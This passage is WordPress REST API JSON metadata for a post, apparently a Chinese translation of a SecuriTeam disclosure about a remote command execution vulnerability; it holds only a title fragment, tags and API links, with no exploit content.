\u4fee\u6539\u5bfc\u81f4\u8fdc\u7a0b\u6267\u884c\u547d\u4ee4\u6f0f\u6d1e<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,12270,11682,10757,12136],"class_list":["post-10483","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-man-in-the-middle","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10483"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10483\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10483"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}